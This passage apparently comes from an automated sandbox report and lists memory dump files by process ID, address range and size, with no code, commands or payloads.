memory/5280-435-0x0000000000000000-mapping.dmp
-
memory/5280-433-0x0000000000000000-mapping.dmp
-
memory/5280-424-0x0000000000000000-mapping.dmp
-
memory/5280-427-0x0000000000000000-mapping.dmp
-
memory/5472-809-0x0000000004B40000-0x0000000004B41000-memory.dmpFilesize
4KB
-
memory/5472-806-0x0000000000000000-mapping.dmp
-
memory/5500-372-0x0000000000000000-mapping.dmp
-
memory/5500-377-0x0000000070220000-0x000000007090E000-memory.dmpFilesize
6.9MB
-
memory/5500-386-0x00000000008A0000-0x00000000008A1000-memory.dmpFilesize
4KB
-
memory/5500-546-0x00000000059B0000-0x00000000059F7000-memory.dmpFilesize
284KB
-
memory/5500-399-0x0000000005260000-0x00000000052B2000-memory.dmpFilesize
328KB
-
memory/5520-382-0x0000000000400000-0x0000000000493000-memory.dmpFilesize
588KB
-
memory/5520-380-0x000000000043FA56-mapping.dmp
-
memory/5520-378-0x0000000000400000-0x0000000000493000-memory.dmpFilesize
588KB
-
memory/5584-710-0x0000000000000000-mapping.dmp
-
memory/5624-856-0x0000000000000000-mapping.dmp
-
memory/5624-859-0x00007FF9A2F40000-0x00007FF9A392C000-memory.dmpFilesize
9.9MB
-
memory/5868-678-0x0000000000000000-mapping.dmp
-
memory/5868-707-0x0000000002260000-0x0000000002270000-memory.dmpFilesize
64KB
-
memory/5868-760-0x0000000004850000-0x00000000048A2000-memory.dmpFilesize
328KB
-
memory/5876-864-0x00007FF9A2F40000-0x00007FF9A392C000-memory.dmpFilesize
9.9MB
-
memory/5876-858-0x0000000000000000-mapping.dmp
-
memory/5916-855-0x00007FF9A2F40000-0x00007FF9A392C000-memory.dmpFilesize
9.9MB
-
memory/5916-852-0x0000000000000000-mapping.dmp
-
memory/6000-715-0x0000000070220000-0x000000007090E000-memory.dmpFilesize
6.9MB
-
memory/6000-709-0x0000000000000000-mapping.dmp
-
memory/6040-792-0x0000000070220000-0x000000007090E000-memory.dmpFilesize
6.9MB
-
memory/6040-788-0x0000000000403BEE-mapping.dmp
-
memory/6092-831-0x00007FF9A2F40000-0x00007FF9A392C000-memory.dmpFilesize
9.9MB
-
memory/6092-828-0x0000000000000000-mapping.dmp
-
memory/6092-827-0x0000000000000000-mapping.dmp
-
memory/6140-867-0x0000000000000000-mapping.dmp
-
memory/6140-871-0x00007FF9A2F40000-0x00007FF9A392C000-memory.dmpFilesize
9.9MB